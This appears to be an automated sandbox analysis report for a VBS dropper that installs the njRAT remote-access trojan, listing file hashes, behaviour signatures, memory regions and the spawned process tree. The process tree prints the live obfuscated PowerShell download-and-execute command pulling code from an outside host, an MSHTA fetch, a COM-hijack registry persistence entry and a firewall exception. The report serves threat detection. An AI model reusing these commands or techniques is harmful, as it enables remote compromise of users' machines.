Analysis
-
max time kernel
135s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
-
submitted
09-08-2022 18:31
General
-
Target
DWRNHNKWSJEHWYPNYOGGOP.vbs
-
Size
1KB
-
MD5
43f89bd927a7e80c8240c61617dee7bf
-
SHA1
6a8ab5c11c1afd276cf5dbb7b125cff26080459f
-
SHA256
f835187e4e7703e00b2da9f5cca7b9a4ab87d26d27b09e5112d563f6f96dcc9a
-
SHA512
f637d2cdbd59a730b65c770d66c2767febe5f9e8662d133717922990fbf3934a4026b5929960c8dfbfdb228cf164b9390badbc92b19dde11f9ebe5a1018379e4
Malware Config
Extracted
https://tradeguru.com.pk/enc2.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 3 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Modifies registry class 4 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs"1⤵
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc2.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HKXSZJPBSFUQNNKBRSHJOKP = '[$=^&7<[[=$0$]=)38}@{(4y$=^&7<[[=$0$]=)38}@{(4t{<1[36&1{3\}0_-\[[14<5*<=7#&\!{9^]&374-84*${.IO.$=^&7<[[=$0$]=)38}@{(4t324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-*<=7#&\!{9^]&374-84*${324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-d{<1[36&1{3\}0_-\[[14<5324)23*2469!/&^!\_0=)7]'.Replace('$=^&7<[[=$0$]=)38}@{(4','S').Replace('{<1[36&1{3\}0_-\[[14<5','E').Replace('324)23*2469!/&^!\_0=)7','R').Replace('&2#/!0/&-%5_]<-$4%%-<-','A').Replace('*<=7#&\!{9^]&374-84*${','M');$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');$HRIYRXVTBWQWWOVQDADEHPL = '[69_&(%*}8]8-%$74]$(#_]y69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}5<%_7<=7_#!{{$&]\%{/1)m.N5<%_7<=7_#!{{$&]\%{/1))-({\)@+/1405_2\8*427}.W5<%_7<=7_#!{{$&]\%{/1)bR5<%_7<=7_#!{{$&]\%{/1)qu5<%_7<=7_#!{{$&]\%{/1)69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}]'.Replace('69_&(%*}8]8-%$74]$(#_]','S').Replace('5<%_7<=7_#!{{$&]\%{/1)','E').Replace(')-({\)@+/1405_2\8*427}','T');$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');$HEPSSGXVTPJJSQLTBOWCTGE = '<[@63<_-53]5@$7[&63/^@r{(51(<04]=6-&01#378}1-a+810347\=@2(3-23#_%166{(51(<04]=6-&01#378}1-'.Replace('<[@63<_-53]5@$7[&63/^@','C').Replace('{(51(<04]=6-&01#378}1-','E').Replace('+810347\=@2(3-23#_%166','T');$HZAUFQYTLDKVFSGTXHYBUGZ = '/(\][54[=_@1]\<9\6\<<{+\88!1}*@<(&9#@692{]_@tR+\88!1}*@<(&9#@692{]_@82]534-04766\1_){4160#pon82]534-04766\1_){4160#+\88!1}*@<(&9#@692{]_@'.Replace('/(\][54[=_@1]\<9\6\<<{','G').Replace('+\88!1}*@<(&9#@692{]_@','E').Replace('82]534-04766\1_){4160#','S');$HRBPYOHOXEOEQFNKBXSNNCQ = 'G!4%@&_9+[%3[)^&%72#813t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@pon$@)(]=][6450_6!7\={3[@!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813am'.Replace('$@)(]=][6450_6!7\={3[@','S').Replace('!4%@&_9+[%3[)^&%72#813','E').Replace('1(!%9*60#7&21^5^67(%8_','R');$HXLAGAHHFUIJNGIUXVDWXPH = '8}*[+%^=_)@93]23#=&&3[!*%1!+]6_&}@@^]$[+}_*]a+-#8%3}]/+*#^1@+5{[%/[To!*%1!+]6_&}@@^]$[+}_*]n+-#8%3}]/+*#^1@+5{[%/['.Replace('8}*[+%^=_)@93]23#=&&3[','R').Replace('!*%1!+]6_&}@@^]$[+}_*]','E').Replace('+-#8%3}]/+*#^1@+5{[%/[','D');&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE('https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ()).$HXLAGAHHFUIJNGIUXVDWXPH())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.batFilesize
706B
MD56a90128893777a59d404d46d3e967104
SHA1e2b70c13764f2f61aa8503999670542237046bc4
SHA256b986b6412802dadf97cc3684372614c084a723c25ad5db606c59a7445914b319
SHA5125e8ed2c486b6e0832fb1516d27a63e531355c61155259438f5d2ab220e0545786a76f3633499d721b94d5857e2d0ce2c04b6ae8918bc316ed639b926fdfa794c
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1Filesize
3KB
MD543864d67842266f76a91dc4aee7338c7
SHA1022259ecb6970f6790c329e36b94402ba815b5e0
SHA256c9aee12c943156b698c5f5413fb0a6bbca87d0dec227d972e59dc974ac39decf
SHA51232bb0b67d9ec8064b13a2db93940ed41ce8bc352364a0222dcef7fc6bef98b7c3a579f608fb3cb5d6b81db49a58b736600831f5c40651e058a635f7502d55980
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbsFilesize
1KB
MD5d6a5f499f7164e0d61a5b8a0b4900fba
SHA1054352e97c7aa7cf0eb3b0cf2ded905fc22a70b9
SHA2565b5e07e5a147d23983fe0adb7fed1c95f76ffe9443bd1394d4a8248a80ad2e44
SHA5122129eb026a406fc52057f1efb9c81e1e8696971ff738093671e1c794c4cb77022bcb8b980c4fc7b1705451e9b86d2cdec87ad35b198d002035cf95dc904ebec2
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50ab03b4ab0ee8273a1eea28cef1ca1e7
SHA18a305ca40e71bd2b04b20c65e28730e3ff3f50b2
SHA256695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed
SHA5127347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5171c8388c36c7ff24bff6d83366bcbd6
SHA1b457641f8c88a56590921ce729d3111a8964107a
SHA256cbb779c4ad16523953107fa4344f29750fd398216b1769ad9476c43ebe919621
SHA51294889b43df68c6fd761e946a220a7deea68318d9685ffe6c42926e647bbf1f3ef650a1c7dc7e7ffe66e4f02c97a32d4105502c9c8835e14795dcd85088b60e99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
memory/632-137-0x0000000000000000-mapping.dmp
-
memory/1128-144-0x0000000000000000-mapping.dmp
-
memory/1272-158-0x0000000005760000-0x00000000057FC000-memory.dmpFilesize
624KB
-
memory/1272-163-0x0000000005E50000-0x0000000005E5A000-memory.dmpFilesize
40KB
-
memory/1272-159-0x0000000005E60000-0x0000000006404000-memory.dmpFilesize
5.6MB
-
memory/1272-160-0x00000000058B0000-0x0000000005942000-memory.dmpFilesize
584KB
-
memory/1272-162-0x0000000005DB0000-0x0000000005E16000-memory.dmpFilesize
408KB
-
memory/1272-152-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1272-153-0x000000000040BBBE-mapping.dmp
-
memory/1436-140-0x0000000000000000-mapping.dmp
-
memory/1808-134-0x0000000000000000-mapping.dmp
-
memory/1808-148-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/1808-136-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/2268-143-0x0000000000000000-mapping.dmp
-
memory/2960-142-0x0000000000000000-mapping.dmp
-
memory/3568-155-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/3568-147-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/3568-145-0x0000000000000000-mapping.dmp
-
memory/4072-161-0x0000000000000000-mapping.dmp
-
memory/4168-157-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/4168-139-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/4624-131-0x000001B54A770000-0x000001B54A792000-memory.dmpFilesize
136KB
-
memory/4624-151-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/4624-133-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/4624-132-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB